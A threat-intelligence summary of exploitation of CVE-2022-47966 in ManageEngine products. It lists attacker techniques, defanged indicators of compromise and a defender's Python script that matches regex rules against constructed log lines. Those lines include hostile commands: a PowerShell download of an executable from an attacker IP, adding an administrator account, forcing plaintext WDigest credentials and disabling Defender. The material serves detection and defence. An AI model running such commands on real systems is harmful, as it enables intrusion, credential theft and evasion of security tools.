Rapid7 analyzes exploitation activity surrounding CVE-2022-47966, a pre-authentication RCE in ManageEngine on-premise products, noting public PoC code and ongoing compromises since January 2023. Organizations using affected products should patch and monitor for signs of intrusion as exploit activity has been observed in the wild. #CVE-2022-47966 #ManageEngine #ServiceDeskPlus #ADSelfServicePlus
Keypoints
- CVE-2022-47966 is a pre-authentication remote code execution vulnerability stemming from a vulnerable third-party dependency in Apache Santuario.
- Patches were released by ManageEngine/Zoho in Oct–Nov 2022, but exploitation was observed as early as Jan 17, 2023.
- Exploitation often begins with a malicious XML payload executing PowerShell to deploy a webshell and then enables persistent access via a renamed Plink tunnel.
- Post-exploitation activity includes creating a local administrator account and modifying the Wdigest registry key to store passwords in plaintext.
- Threat activity leverages PowerShell, Ingress Tool Transfer, protocol tunneling, and remote desktop-related actions to establish control and persistence.
- Rapid7 provides detections via InsightIDR, vulnerability checks via InsightVM/Nexpose, and a Velociraptor hunting artifact for these campaigns.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Exploitation of CVE-2022-47966 in ManageEngine products enabling pre-auth RCE. Quote: “exploitation across organizations as early as January 17, 2023 (UTC).”
- [T1059.001] PowerShell – Command and scripting interpreter used to execute payloads and download tools. Quote: “The payload in the malicious XML document executed a PowerShell command…”
- [T1505.003] Web Shell – Creation of a web shell by piping a Base64 payload into a web-accessible script and decoding it to a JSP page. Quote: “payload in the malicious XML document executed a PowerShell command that piped a Base64 encoded webshell into ../webapps/ROOT/scripts/ae_commons.js, where it was subsequently decoded into ../custom/login/commons.jsp.”
- [T1562.001] Defense Evasion – Disable or modify security tools (e.g., Defender realtime monitoring). Quote: “Defense Evasion: Disable Modify tools (Disable Defender realtime)”
- [T1105] Ingress Tool Transfer – Use PowerShell/Invoke-WebRequest to download additional remote-access tools. Quote: “Powershell cmdlet Invoke-WebRequest(IWR) used to download additional remote access tools”
- [T1572] Protocol Tunneling – Establishing tunneling for persistence and access (Plink/Chisel). Quote: “Protocol Tunneling: Chisel, Golang implementation of protocol tunneling tool – similar to Plink.”
- [T1136.001] Create Account – Create or modify local accounts to maintain access. Quote: “Create an account named guest to the local administrators group.”
- [T1555.003] Credentials in Registry – Modify WDigest to force plaintext password storage for credential harvesting. Quote: “modified the Wdigest registry key to force the system to store passwords in plaintext…”
- [T1021.001] Remote Services – Enable and use Remote Desktop/Remote Services for persistence and access. Quote: “net localgroup administrators guest /add … and enabling Remote Desktop”
- [T1496] Resource Hijacking – Miner installation (Monero) to abuse system resources. Quote: “Resource Hijacking: Coinminer installation (Monero)”
- [T1059.001] PowerShell – Reverse/shell-like command execution pattern observed in post-exploitation. Quote: “PowerShell (PowerShell reverse shell) …”
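A small defender-side triage script, added here as an example and not taken from Rapid7's report or its InsightIDR/Velociraptor content: it runs regexes for the post-exploitation command-line patterns listed above over constructed process-creation records. The record format, the host name, and the assumption that the ManageEngine Java process is PowerShell's parent are this example's own.

```python
import re

# Rules keyed on the post-exploitation command lines described above; IDs follow the
# summary's labels. Patterns are this example's own, not Rapid7's InsightIDR rules.
RULES = [
    ("T1059.001", "PowerShell spawned by the ManageEngine Java process (assumed parent)",
     re.compile(r"^java\.exe\|.*powershell", re.I)),
    ("T1105", "Invoke-WebRequest download of a remote tool",
     re.compile(r"(invoke-webrequest|\biwr\b).*https?://", re.I)),
    ("T1505.003", "Web shell staged via ae_commons.js / commons.jsp",
     re.compile(r"ae_commons\.js|custom[\\/]login[\\/]commons\.jsp", re.I)),
    ("T1562.001", "Defender real-time monitoring disabled",
     re.compile(r"Set-MpPreference.*DisableRealtimeMonitoring", re.I)),
    ("T1136.001", "Local account added to the Administrators group",
     re.compile(r"net\s+localgroup\s+administrators\s+\S+\s+/add", re.I)),
    ("T1555.003", "WDigest set to keep plaintext credentials",
     re.compile(r"WDigest.*UseLogonCredential.*/d\s+1", re.I)),
    ("T1572", "Renamed Plink (ekern.exe) run from the temp directory",
     re.compile(r"windows[\\/]temp[\\/]ekern\.exe", re.I)),
]

# Constructed process-creation records, "host|parent image|command line" (not real telemetry).
SAMPLE_LOGS = [
    'mesrv01|java.exe|powershell -c "$b64 | Out-File ..\\webapps\\ROOT\\scripts\\ae_commons.js"',
    "mesrv01|powershell.exe|powershell IWR http://111.68.7[.]122:8081/svhost.exe -OutFile C:\\windows\\temp\\svhost.exe",
    "mesrv01|cmd.exe|net localgroup administrators guest /add",
    "mesrv01|cmd.exe|reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f",
    "mesrv01|powershell.exe|Set-MpPreference -DisableRealtimeMonitoring $true",
    "mesrv01|cmd.exe|C:\\windows\\temp\\ekern.exe <tunnel arguments>",
    "mesrv01|svchost.exe|C:\\Windows\\System32\\wuauclt.exe /detectnow",  # benign control line
]

def parse_line(line: str) -> dict:
    """Split a record into its three fields; extra '|' in the command line are preserved."""
    host, parent, cmd = line.split("|", 2)
    return {"host": host, "parent": parent, "cmd": cmd}

def scan(lines) -> list[dict]:
    """Return one hit per (record, rule) match, in log order, tagged with the technique ID."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        subject = f"{rec['parent']}|{rec['cmd']}"  # parent kept so rules can key on it
        for tid, name, rx in RULES:
            if rx.search(subject):
                hits.append({"technique": tid, "name": name, **rec})
    return hits
```

Running `scan(SAMPLE_LOGS)` yields seven hits in log order and none for the benign control line; feeding it real process-creation telemetry in the same three-field shape is the intended use.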
Indicators of Compromise
- [Network IOCs] Rapid7 aggregated network IOCs – 111.68.7[.]122, 50.19.48[.]59, and 7 more IOCs
- [File Names/Paths] Webshell artifacts and executables – ae_commons.js, ../custom/login/commons.jsp, and C:\windows\temp\ekern.exe
- [URLs] Download and command-and-control URLs – http://172.93.193[.]64/file.exe, http://111.68.7[.]122:8081/svhost.exe, and 1 more URL